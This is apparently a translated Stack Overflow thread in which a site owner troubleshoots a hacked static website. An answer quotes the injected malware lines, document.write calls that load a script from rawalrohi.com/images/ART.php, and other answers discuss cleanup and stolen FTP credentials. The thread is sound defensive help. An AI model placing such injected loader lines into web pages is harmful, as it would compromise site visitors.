Загадочный URL на нашем html-сайте

Домашняя страница нашего статического HTML-сайта http://www.ifort.com передает данные из таинственного сайт rawalrohi.com. Вы можете проверить это, зайдя на iffort.com и заметив там нижний колонтитул. Пишет, что данные передаются с сайта rawalrohi.com.

Со своей стороны мы сделали следующие вещи, чтобы исправить проблему

а.) Проанализируйте исходный код всех страниц. Мы проверили код и выяснили, что скрипт src=http://rawalrohi.com/images/ART.php был вставлен на все страницы. Мы удалили этот скрипт со всех html-страниц сайта.

б.) Затем мы поговорили с хостинговой компанией, они сказали, что могут предоставить нам резервную копию сайта. У нас есть резервная копия, но мы не использовали ее для восстановления сайта.

c.) Наконец, мы изменили пароль FTP, потому что нам сказали, что кто-то мог взломать наш пароль FTP.

Несмотря на это, на домашней странице по-прежнему указано, что данные передаются с сайта rawalrohi.com. Источник просмотра не показывает URL. Это замедляет работу нашего сайта.

Любая помощь приветствуется.


web html security code-injection
person Daksh    schedule 21.10.2009    source источник
comment
Это больше для сбоя сервера.   -  person Daniel A. White    schedule 21.10.2009

Ответы (6)


arrow_upward
3
arrow_downward

Ваша страница ссылается на файл с именем "js/hyperlinked_Images.js". Взгляните на этот файл, прямо внизу:

...
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');

Теперь, если вы меня извините, я собираюсь запустить быстрое антивирусное сканирование моей системы ;)

person FrustratedWithFormsDesigner    schedule 21.10.2009
comment
Спасибо за ответ. Его тоже надо убрать? Я имею в виду файл js? - person Daksh; 21.10.2009
comment
Да, вам, вероятно, следует удалить это, если вы не знаете, почему оно там. - person FrustratedWithFormsDesigner; 21.10.2009
comment
Просто удалил последние 3 строки в этом коде. Загрузил новый файл. Что еще нужно отредактировать? - person Daksh; 21.10.2009
comment
Я не уверен, но похоже, что вам нужно провести очень подробный аудит файлов на вашем сервере. Возможно, выполните поиск всех файлов в каталоге вашего хостинга на наличие rawalrohi и очистите их. Другим вариантом было бы просто переформатировать ваш сервер и переустановить серверное программное обеспечение и переустановить сайт, предполагая, что ваша резервная копия сайта не испорчена. Основная проблема при таком подходе — время простоя. Кроме того, не все хостинговые компании позволят вам это сделать (или сделают это за вас). - person FrustratedWithFormsDesigner; 21.10.2009
comment
Да, вы правы, длительный процесс. Прямо сейчас я искал в каталоге хостинга rawalrohi и ничего не нашел. - person Daksh; 21.10.2009
comment
Кстати, они предоставили резервную копию от 15 октября. - person Daksh; 21.10.2009

arrow_upward
1
arrow_downward

убедитесь, что вы не используете одну учетную запись FTP для всего, контролируйте управление пользователями FTP, это поможет вам управлять своим сайтом.

person Shiro    schedule 21.10.2009
comment
Привет, Широ. Извините, не могли бы вы уточнить это? - person Daksh; 21.10.2009

arrow_upward
1
arrow_downward

Я видел подобное поведение некоторое время назад. В этом конкретном случае ftp-пароль был скомпрометирован: он был прочитан с настольного ПК клиента вредоносной программой, которая собирала сохраненные ftp-пароли.

Мы узнали об этом только после того, как пароль был изменен и снова скомпрометирован в течение нескольких дней.

Поэтому убедитесь, что вы сканируете все машины, которые «знают» пароль ftp, с помощью приличного AV-сканера.

person Jacco    schedule 21.10.2009

arrow_upward
0
arrow_downward

Я только недавно видел это на веб-сайте клиентов, другой URL-адрес, но тот же тип внедрения кода был во всех их файлах. Чтобы решить эту проблему, я загружаю сайт и использую Visual Studio, чтобы выполнить поиск и замену строки по всему сайту. Это решило проблему для меня. Я предлагаю вам сделать что-то подобное для всех файлов, возможно, вы что-то пропустили. На моем клиентском сайте были файлы html/htm/aspx, которые были заражены, интернет-провайдер сделал то же заявление о том, что пароль FTP, вероятно, был скомпрометирован...

person Zachary    schedule 21.10.2009
comment
Спасибо, Захари. Хостинговые компании довольно безрассудны в своем поведении. Посмотрим, что мы можем сделать, возможно, скачаем весь код. - person Daksh; 21.10.2009

arrow_upward
0
arrow_downward

Убедитесь, что вы на своем антивирусе. Всякий раз, когда ваш сайт загружает забавный внешний скрипт, такой как рекламное ПО, шпионское ПО, ваш антивирус предупредит вас.

person i need help    schedule 21.10.2009
comment
Использование антивируса Mcafee. он всегда включен. Никогда не предупреждал меня ни о чем подозрительном :( - person Daksh; 21.10.2009
comment
Антивирусные приложения никогда не поймают все. Всегда есть возможность, чтобы какие-то вещи прошли через них. - person FrustratedWithFormsDesigner; 21.10.2009

arrow_upward
0
arrow_downward

Я не сканировал ваш сайт, но если вы используете какое-либо стандартное программное обеспечение на своем веб-сайте, например: WordPress, Drupal, Joomla и т. д., вам необходимо постоянно обновлять его. Подпишитесь на их оповещения о безопасности, и всякий раз, когда вы видите обновление, бросайте все, что вы делаете, и обновляйте.

Хакеры постоянно сканируют Интернет на наличие уязвимых веб-сайтов. Им требуется всего доля секунды на уязвимом сайте, чтобы заразить его.

Кроме того, обновляйте все плагины, надстройки, компоненты, модули, вклады и т. д.

В противном случае вы будете чистить это снова и снова.

person WeWatchYourWebsite    schedule 28.01.2011